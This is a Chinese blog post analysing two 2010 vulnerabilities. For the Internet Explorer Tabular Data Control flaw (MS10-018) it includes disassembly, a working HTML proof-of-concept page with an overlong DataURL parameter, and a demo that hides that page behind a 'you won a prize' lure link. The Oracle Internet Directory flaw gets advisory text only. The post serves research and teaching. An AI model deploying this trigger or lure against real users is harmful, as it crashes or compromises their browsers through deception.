cve漏洞分析:cve-2010-0805(附带测试代码) cve-2010-0853

最新推荐文章于 2024-05-23 21:25:20 发布
最新推荐文章于 2024-05-23 21:25:20 发布
阅读量3.7k 收藏 1
点赞数
文章标签: 2010 测试 microsoft oracle internet windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jo_say/article/details/5618525
版权

【警告:以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负】

对象1:【附带攻击测试代码和效果演示】

1.      CVE编号cve-2010-0805

2.      微软漏洞编号ms10-018

3.      漏洞名称Microsoft IE Tabular Data Control ActiveX控件远程代码执行漏洞

4.      危害性:可执行远程特殊代码,溢出后获得当前用户权限

5.      危害等级:8

6.      涉及软件Microsoft IE

7.      受影响版本

Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4

相关windows系统:

windows_2000::SP4

windows_xp::sp1

windows_xp::sp2

windows_xp::sp3

8.      漏洞分析

Internet ExplorerWindows操作系统中默认捆绑的web浏览器。Internet ExplorerTabular Data Control ActiveX模块(tdc.ocx)中存在栈破坏漏洞。如果向CTDCCtl::SecurityCHeckDataURL函数传送了超长的DataURL参数,就可以触发这个漏洞,导致向任意内存位置写入单个NULL字节。攻击者可以通过构建特制的网页来利用该漏洞,当用户查看网页时,该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与登录用户相同的用户权限。

9.      临时解决方法:

l  Office中禁用ActiveX控件。

l  Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件和活动脚本之前进行提示。

l  Internet 和本地Intranet安全区域设置设为“高”,以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。

l  不要打开意外的文件或者邮件。

10.  厂商补丁:

Microsoft已经为此发布了一个安全公告(MS10-018)以及相应补丁

MS10-018Cumulative Security Update for Internet Explorer (980182)链接:http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx?pf=true

11.  攻击测试代码:

 

# CVE : CVE-2010-0805

<!--

.text:600058F7                 and     [ebp+pv], 0

.text:600058FE                 lea     eax, [ebp+pv]

.text:60005904                 push    eax             ; unsigned __int16 **

.text:60005905                 push    dword ptr [ebx+10h] ; struct IOleClientSite *

.text:60005908                 call    GetHostURL(IOleClientSite *,ushort * *)

.text:6000590D                 mov     eax, [ebp+var_218]

.text:60005913                 push    [ebp+pv]        ; pv

.text:60005919                 mov     [ebp+eax+var_204], 0

.text:60005921                 mov     eax, [ebp+var_21C]    ; length of the DataURL param

.text:60005927                 mov     [ebp+eax+var_104], 0        ; write one byte to arbitrary stack address

-->

<html>

<title>Trigger for ZDI-10-034 by ZSploit.com</title>

<head>

</head>

<body>

<object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">

<param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/>

</object>

</body>

</html>

测试代码演示

 

12.  效果演示:

a 搭建环境:

操作系统

1)      Windows xp::SP2 测试环境

2)      Windows 7 比较环境

IE版本

IE 6.0 / IE8.0

IIS

IIS5.0

虚拟机

Vmware 7

b 测试过程:(只给出可用性攻击)

l  VM7中装入Windows xp sp2,配置IIS环境。

l  把测试代码写入记事本,保存为任意名称的html文件,如attack.html

l  attack.html放入 C:/Inetpub/wwwroot目录下(iis的默认目录)

l  做一个普通的html文件price.html,作为诱饵,显示文本为:恭喜你,中奖了!让此文本链接指向attack.html.  

 

l  打开IE浏览器(IE6.0),访问http://localhost/price.html, 点击“ 恭喜你,中奖了!”。 IE崩溃,界面瞬间消失。系统日志记录为:

l  同上在windows7下搭建以上环境,点击诱饵后,IEIE8)将显示attack.html中的内容,没有出现问题。

 

对象2

1.      CVE编号cve-2010-0853

2.      漏洞名称:

Oracle Fusion Middleware CVE-2010-0853 Oracle Internet目录远程漏洞

3.      危害性:拒绝服务、远程代码执行

4.      危害等级:7

5.      涉及软件:Oracle

6.      受影响版本:

Oracle Oracle9i Standard Edition 9.2 .8DV

Oracle Oracle9i Standard Edition 9.2 .8

Oracle Oracle9i Personal Edition 9.2 .8DV

Oracle Oracle9i Enterprise Edition 9.2 .8DV

Oracle Oracle9i Enterprise Edition 9.2 .8.0

Oracle Oracle Identity Management 10g 10.1.4 .0.1

Oracle Application Server 10.1.2.3

7.      漏洞分析:(此漏洞由oracle官方发布,对漏洞技术细节提及较少)

Oracle Fusion MiddlewareOracle 的中间件解决方案组合,用于协助开发、部署及管理SOA和其它应用程序。Oracle Fusion中间件所使用的Oracle Internet DirectoryPortal组件中存在安全漏洞,通过认证的远程用户可以通过LDAPHTTP协议来利用这些漏洞完全入侵数据库系统。

8.      厂商补丁:

Oracle已经为此发布了一个安全公告(cpuapr2010)以及相应补丁:

cpuapr2010Oracle Critical Patch Update Advisory - April 2010

链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html

 

 

 

 

 

 

 

jo_say
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Windows远程桌面服务漏洞CVE-2019-0708)复现测试
四维创智
09-19 6522
1、漏洞概述 2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成...
cve-2017-12617 tomcat远程代码执行漏洞复现测试
whatday的专栏
08-30 3470
0x00前情提要 Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞CVE-2017-12617:远程代码执行漏洞。 只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的)。发现并阻止上传Jav
CVE-2020-7982 OpenWrt 远程命令执行漏洞学习(完结)
最新发布
weixin_51339377的博客
05-23 1172
OpenWrt是一款应用于嵌入式设备如路由器等的Linux操作系统。类似于kali等linux系统中的apt-get等,该系统中下载应用使用的是opgk工具,其通过非加密的HTTP连接来下载应用。但是其下载的应用使用了SHA256sum哈希值来进行检验,所以将下载到的数据包进行哈希值的比对即可知道是否下载的数据包被修改,所以理论上来说是没有安全隐患的。
漏洞简述-漏洞分析实例是编号CVE-2006-3439
m0_64973256的博客
08-26 356
视频制作不易,求三联支持,拜谢~ +公众账号(极安御信安全研究院/北京极安御信安全研究院)报暗号:“资料” 即可领取视频相关工具、源码、学习资料,和其他逆向工程免费课。进交流群报暗号“交流群” ...
Microsoft Windows CredSSP 远程执行代码漏洞CVE-2018-0886
热门推荐
看着博客敲代码
04-16 3万+
Microsoft Windows CredSSP 远程执行代码漏洞 Microsoft Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1和RT 8.1,Windows Server 2012和R2,Windows 10 Gold,1511,1687,1703和1709中的凭证安全支持提供程序协议(CredSSP)Windows Server 2016由于CredSSP在身份验证过程中验证请求的方式(即“CredSSP远程执行代码漏洞”),17
什么是CVE?常见漏洞和暴露列表概述
Trinity_Techologies的博客
05-18 1万+
常见漏洞和暴露(Common Vulnerability and Exposures,简称CVE)收集了已知的网络安全漏洞和暴露,以帮助您更好地保护您的嵌入式软件。 在这里,我们会阐释什么是CVECVE列表中包括哪些内容,以及它如何帮助确保您的软件是安全的。
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
cve-search:cve-search-一种对已知漏洞执行本地搜索的工具
02-25
cve-search是一种工具,可将CVE(常见漏洞和披露)和CPE(通用平台枚举)导入MongoDB中,以方便CVE的搜索和处理。 该软件的主要目的是避免对公共CVE数据库进行直接和公共查找。 本地查询通常更快,您可以通过...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的...
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011-2232, CVE-2011-2238, CVE-2011-2239, CVE-2011-2242, CVE-2011-2243, CVE-2011-2244, CVE-2011-2248, CVE-2011-2253, CVE-2011-2257CVE-2011-0799 CVE-2011-0805 CVE-2009-3555 CVE-2011-0793, CVE-2011-0804, CVE-2011-0806 (Windows only)
如何查找oracle漏洞对应补丁号,Oracle 漏洞补丁如何查找下载并打补丁,什么漏洞都可用Opatch?...
weixin_33397740的博客
04-04 3532
我需要打这么多漏洞,有没有大师跟我 说如何处理比较好,是否是一个一个下载漏洞?序号 危险级别 漏洞编号 漏洞名称 返回信息12 高危险 009A071 Oracle数据库服务器Core RDBMS组件安全漏洞(CVE-2011-2239) Oracle Version:11.2.0.1....
​​​​​​​CVE-2010-3333分析
wangtiankuo的博客
11-23 481
1.漏洞背景     RTF中“pFragments”属性存在栈溢出,远程攻击者可以借助特制的RTF数据执行任意代码。     RTF分析器在解析pFragments属性值时,没有正确计算属性值所占用的空间大小,导致栈溢出漏洞的发生,      后面有个图里圈出了要复制的数据大小以及数据。 2.漏洞成因     使用msf生成漏洞文档后,用windbg打开,在30e9eb88处发生...
IIS 7 HTTP.sys漏洞深入分析
weixin_33832340的博客
04-18 636
http.sys漏洞影响范围随着各方的深入分析,各地域受Windows HTTP.sys漏洞影响的情况正在逐渐浮出水面。昨天的通告信息中提到Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序,据绿盟科技互联网广谱平台数据显示,全球部署IIS的系统数量大概有444万余,从目前受影响的IIS各版本分布统计数据来看,其中IIS 7.5部署量最大,占比...
IIS7 HTTP.sys漏洞深入分析
gnaw0725博客
04-18 9164
http.sys漏洞影响范围 随着各方的深入分析,各地域受Windows HTTP.sys漏洞影响的情况正在逐渐浮出水面。昨天的通告信息中提到Http.sys是Microsoft Windows处理HTTP请求的内核驱动程序,据绿盟科技互联网广谱平台数据显示,全球部署IIS的系统数量大概有444万余,从目前受影响的IIS各版本分布统计数据来看,其中IIS 7.5部署量最大,占比42.3%,也是本
CVE-2020-1938漏洞复现
Ch_an_ger的博客
06-18 1778
一、漏洞描述 Apache Tomcat服务器存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat 上所有webapp 目录下的任意文件,如:webapp 配置文件或源代码等。 二、Tomcat任意文件读取漏洞 Tomcat默认开启AJP服务,运行在8009端口,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web上的任意文件。 tomcat在接收ajp请求的时候调用org.apache.coyote.ajp.AjpProcessor来处理ajp消息,prepareRe
Microsoft RTF栈溢出漏洞(CVE-2010-3333)漏洞分析
鬼手的博客
08-04 1975
文章目录漏洞描述分析环境RTF文件格式基于栈回溯的漏洞分析方法漏洞利用Office 2003与Office 2007 Exploit通用性研究 漏洞描述 Microsoft Office XP SP3,Office2003SP3,Office2007 SP2,Office 2010等多个版本的Office软件中,Open XML文件格式转换器存在栈溢出漏洞,主要是在处理RTF中的pFragment...
Apache Spark 命令注入漏洞CVE-2022-33891)修复与利用
Apache Spark 命令注入漏洞CVE-2022-33891) Apache Spark 命令注入漏洞CVE-2022-33891)是 Apache Spark 中的一种高危漏洞,允许攻击者通过命令注入来执行恶意命令,从而控制服务器。该漏洞影响 Apache Spark ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值